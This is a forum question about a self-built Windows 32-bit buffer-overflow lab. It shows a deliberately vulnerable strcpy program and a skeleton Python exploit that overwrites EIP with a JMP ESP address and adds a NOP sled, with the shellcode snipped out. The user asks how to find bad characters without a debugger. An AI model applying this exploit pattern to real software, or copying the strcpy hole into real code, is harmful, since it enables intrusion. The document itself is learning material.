# How To Find Bad Characters if I cannot debug the program - Windows 32 bit Buffer Overflow

Tags: python, c++, buffer-overflow

I have been testing BoF (Windows 32 bit) on the following vulnerable program (**vuln.exe**):

```
#include <iostream> 
#include <cstring>
 
int bf_overflow(char *str){ 
       char buffer[10];      
       strcpy(buffer,str); 
       return 0; 
} 
 
int main(int argc, char *argv[]) 
{ 
       printf("Start\n"); 
       bf_overflow(argv[1]);  
        
       printf("End\n"); 
       return 0; 
}
```

For debugging, I have been using Immunity Debugger and mona.py.

I managed to find required offset to overwrite EIP, found memory address with JMP ESP instruction and so on.

**bof_exploit.py**:

```
import os

junk = "\x61" * 22 # junk data

eip = "\xe7\x50\x87\x77" # address of JMP ESP instruction in little-endian

buf = b"<SNIP>"

nop = "\x90" * 20

payload = junk + eip + nop + buf

command = "vuln.exe " + payload
os.system(command)
```

Now, while generating the shellcode, I need to consider excluding bad characters. However, if I run **python bof_exploit.py**, I am not able to debug **vuln.exe** in Immunity Debugger since it will be executed by the python script. Likewise, if I debug **vuln.exe** directly in Immunity Debugger, I am not able to pass any command output or hex values (character array created by mona) as arguments to the program.

When I was testing BoF on Linux, I was doing the following to pass char array to find out bad chars:

```
gdb $(python -c "...")
```

My question is:

"Is there any method of finding bad characters if I am not able to debug the vulnerable program"?

**OR**

"Is there any way in Immunity Debugger to pass hex character array created by mona as command line argument to the program"?

Thanks!

Comment: What do you mean by 'Bad Characters'?